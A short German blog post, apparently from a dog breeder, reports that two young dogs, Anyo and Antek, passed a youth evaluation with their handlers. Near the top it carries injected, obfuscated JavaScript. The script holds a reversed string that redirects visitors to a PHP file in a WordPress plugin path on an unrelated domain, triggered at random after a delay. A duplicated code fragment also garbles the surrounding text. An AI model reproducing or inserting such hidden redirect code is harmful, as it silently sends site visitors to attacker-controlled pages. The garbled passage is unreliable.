Jugendbeurteilung: Anyo und Antek

Jürgen mit Anyo Melanie mit Antek

$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden!
Bei dieser Prüfung wird nach einer ausführlichen Erscheinungsbild-Beurteilung auch der Spiel- und Beutetrieb überprüft, bevor es in den Parcours mit verschiedenen optischen und akustischen Einflüssen geht.
Anyo und Antek, aber auch Jürgen und Melanie haben ihre Sache gut gemacht und ich bin richtig stolz – es ist unheimlich schön zu sehen, wie gut die Teams harmonieren. Hier haben sich sprichwörtlich Topf und Deckelchen gefunden! Weiter so!

Und nun wie gehabt einige Bilder: